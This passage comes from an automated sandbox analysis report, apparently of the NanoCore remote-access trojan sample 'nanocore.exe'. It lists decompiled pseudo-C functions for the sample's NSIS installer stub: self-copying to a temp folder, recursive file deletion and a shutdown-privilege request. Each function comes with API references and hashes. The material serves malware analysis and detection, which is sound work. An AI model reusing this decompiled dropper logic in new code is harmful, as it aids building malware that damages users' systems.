            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x561c2c
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















            0x00402e86
            0x00402eb4
            0x00402eba
            0x00402ec0
            0x00402ec8
            0x00402ecf
            0x00402ecf
            0x00402ed4
            0x00402edb
            0x00402ee2
            0x00402ef4
            0x00402efb
            0x00402f1a
            0x00402f26
            0x00402f41
            0x00402f44
            0x00402f4b
            0x00402f51
            0x00402f58
            0x00402f5b
            0x00402f5d
            0x00402f61
            0x00402f6b
            0x00402f6b
            0x00402f6d
            0x00402f73
            0x00402f76
            0x00402f78
            0x00402f7e
            0x00402f7f
            0x00402f85
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f63
            0x00402f63
            0x00402f63
            0x00402f66
            0x00402f67
            0x00000000
            0x00402f63
            0x00402f53
            0x00000000
            0x00402f53
            0x00402f2c
            0x00402f31
            0x00402f33
            0x00402f35
            0x00000000
            0x00402efd
            0x00402efd
            0x00402f02
            0x00402f04
            0x00402f05
            0x00402f3a
            0x00402f3a
            0x00402f88
            0x00402f89
            0x00000000
            0x00402f92
            0x00402e8e
            0x00402e8e
            0x00402e95
            0x00402e96
            0x00402e98
            0x00000000
            0x00402e9d

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe,00000104), ref: 00402EB4
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Users\user\Desktop\nanocore.exe$WV
            • API String ID: 514040917-1748748002
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



            0x0040557b
            0x00405586
            0x0040558d

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: P3V
            • API String ID: 3253501508-3852363347
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: nanocore.exe PID: 4108 Parent PID: 968 nanocore.exeCOMMON

            Executed Functions

            Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "C:\\Users\\jones\\Desktop\\nanocore.exe 0";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("C:\\Users\\jones\\Desktop\\nanocore.exe 0" == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































            0x00403153
            0x00403156
            0x0040315a
            0x0040315f
            0x00403164
            0x0040316b
            0x00403171
            0x00403187
            0x00403197
            0x0040319c
            0x004031a7
            0x004031ad
            0x004031b2
            0x004031b4
            0x004031da
            0x004031da
            0x004031e0
            0x004031ee
            0x00403202
            0x00403207
            0x00403209
            0x0040320b
            0x00403210
            0x00403210
            0x00403220
            0x00403226
            0x0040328f
            0x0040328f
            0x00403291
            0x00403293
            0x00000000
            0x00000000
            0x0040322c
            0x0040322f
            0x00403237
            0x00403237
            0x0040323a
            0x0040323f
            0x00403241
            0x00403241
            0x00403242
            0x00403242
            0x00403247
            0x0040324a
            0x0040327f
            0x00403284
            0x00403289
            0x0040328c
            0x0040328e
            0x0040328e
            0x0040328e
            0x00000000
            0x0040324c
            0x0040324c
            0x0040324d
            0x00403250
            0x00403258
            0x0040325b
            0x0040325d
            0x0040325d
            0x0040325d
            0x0040325b
            0x00403260
            0x00403266
            0x0040326e
            0x00403271
            0x00403273
            0x00403273
            0x00403273
            0x00403271
            0x00403276
            0x0040327d
            0x00403297
            0x0040329b
            0x004032a4
            0x004032a9
            0x004032aa
            0x004032af
            0x004032b3
            0x00403316
            0x00403316
            0x0040331b
            0x00403323
            0x0040344e
            0x00403455
            0x00403471
            0x0040347e
            0x00403487
            0x00403489
            0x0040348b
            0x0040348d
            0x0040348f
            0x00403491
            0x00403493
            0x004034a3
            0x004034a5
            0x004034a7
            0x004034b4
            0x004034c3
            0x004034cb
            0x004034d3
            0x004034d3
            0x004034a7
            0x00403493
            0x0040348f
            0x004034d8
            0x004034de
            0x004034e0
            0x004034e4
            0x004034e4
            0x004034e0
            0x004034e9
            0x004034ee
            0x004034f1
            0x004034f3
            0x004034f3
            0x004034fb
            0x004034fb
            0x0040332f
            0x00403336
            0x00403336
            0x004032bb
            0x00403306
            0x00403306
            0x00403312
            0x00000000
            0x00403312
            0x004032c4
            0x004032d1
            0x004032c8
            0x004032ce
            0x00000000
            0x00000000
            0x004032d0
            0x004032d0
            0x004032d0
            0x004032d5
            0x004032d7
            0x004032dc
            0x00403342
            0x0040334a
            0x00403350
            0x0040335f
            0x00403361
            0x0040336a
            0x00403375
            0x0040337f
            0x00403387
            0x00000000
            0x00000000
            0x004033b3
            0x00000000
            0x00000000
            0x004033c9
            0x004033d2
            0x004033de
            0x004033ee
            0x004033e0
            0x004033e6
            0x004033e6
            0x004033f9
            0x00403403
            0x0040340e
            0x00403415
            0x0040341b
            0x00403422
            0x00403429
            0x0040342c
            0x00403432
            0x00403432
            0x00403429
            0x00403434
            0x00403434
            0x0040343a
            0x0040343e
            0x00000000
            0x00403449
            0x004032de
            0x004032e1
            0x004032ec
            0x00000000
            0x00000000
            0x004032f4
            0x004032ff
            0x00403304
            0x00000000
            0x00403304
            0x00000000
            0x0040327d
            0x00000000
            0x00000000
            0x00000000
            0x00403231
            0x00403231
            0x00403231
            0x00403232
            0x00403232
            0x00000000
            0x00403231
            0x00000000
            0x00403295
            0x004031bc
            0x004031c8
            0x004031d4
            0x00000000
            0x00000000
            0x00000000

            APIs
            • #17.COMCTL32 ref: 00403164
            • OleInitialize.OLE32(00000000), ref: 0040316B
            • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
              • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            • DeleteFileA.KERNELBASE(C:\Users\user\Desktop\nanocore.exe 0), ref: 004031E0
            • GetCommandLineA.KERNEL32 ref: 004031E6
            • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 004031F5
            • CharNextA.USER32(00000000,C:\Users\user\Desktop\nanocore.exe 0,00000020), ref: 00403220
            • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
            • ExitProcess.KERNEL32 ref: 00403336
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,00000000,00000020), ref: 00403342
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,00000000,00000020), ref: 0040334A
            • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
            • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
            • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
            • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
            • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
            • CopyFileA.KERNEL32 ref: 004033C1
            • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
            • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
            • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
            • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
            • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
            • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
            • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
            • ExitProcess.KERNEL32 ref: 004034FB
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$ _?=$"$@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
            • API String ID: 3079827372-4011719288
            • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
            • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















            0x0040530c
            0x00405310
            0x00405319
            0x0040531c
            0x0040531f
            0x00405327
            0x00405329
            0x0040532a
            0x00000000
            0x0040532a
            0x00405339
            0x00405339
            0x0040533c
            0x0040533f
            0x00405353
            0x0040535a
            0x0040535f
            0x00405361
            0x00405371
            0x00405363
            0x00405369
            0x00405369
            0x0040537c
            0x00405391
            0x00405393
            0x00405399
            0x0040539c
            0x0040539f
            0x00405461
            0x00405461
            0x00405465
            0x00405467
            0x00405467
            0x00405467
            0x00405467
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004053a5
            0x004053a5
            0x004053ae
            0x004053b4
            0x004053b9
            0x004053bc
            0x004053be
            0x004053c2
            0x004053c4
            0x004053c4
            0x004053c2
            0x004053c7
            0x004053ca
            0x004053dd
            0x004053df
            0x004053e4
            0x004053ea
            0x004053ec
            0x00405407
            0x0040540e
            0x00405414
            0x00405416
            0x0040543b
            0x00405418
            0x00405418
            0x0040541c
            0x00405430
            0x0040541e
            0x00405421
            0x00405429
            0x00405429
            0x0040541c
            0x004053ee
            0x004053f4
            0x004053f6
            0x004053fc
            0x004053fc
            0x004053f6
            0x00000000
            0x004053ec
            0x004053cc
            0x004053cf
            0x004053d1
            0x00000000
            0x00000000
            0x004053d3
            0x004053d5
            0x00000000
            0x00000000
            0x004053d7
            0x004053db
            0x00000000
            0x00000000
            0x00000000
            0x00405440
            0x0040544a
            0x00405450
            0x00405450
            0x0040545b
            0x00000000
            0x00405341
            0x00405341
            0x00405343
            0x0040546b
            0x0040546e
            0x00405471
            0x004054c9
            0x004054c9
            0x004054c9
            0x00405473
            0x00405476
            0x00405481
            0x00405486
            0x00405488
            0x00000000
            0x00000000
            0x0040548b
            0x00405496
            0x0040549d
            0x004054a3
            0x004054a5
            0x00000000
            0x004054c1
            0x004054a7
            0x004054ab
            0x00000000
            0x00000000
            0x004054b0
            0x00000000
            0x004054b7
            0x00405478
            0x00405478
            0x00000000
            0x00405478
            0x00405349
            0x0040534d
            0x00000000
            0x00000000
            0x00000000
            0x0040534d

            APIs
            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040531F
            • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405369
            • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040537C
            • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405382
            • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00405393
            • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
            • FindClose.KERNEL32(?), ref: 0040545B
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
            • \*.*, xrefs: 00405363
            • C:\Users\user\Desktop\nanocore.exe 0, xrefs: 0040530B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$\*.*
            • API String ID: 2035342205-464020764
            • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
            • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
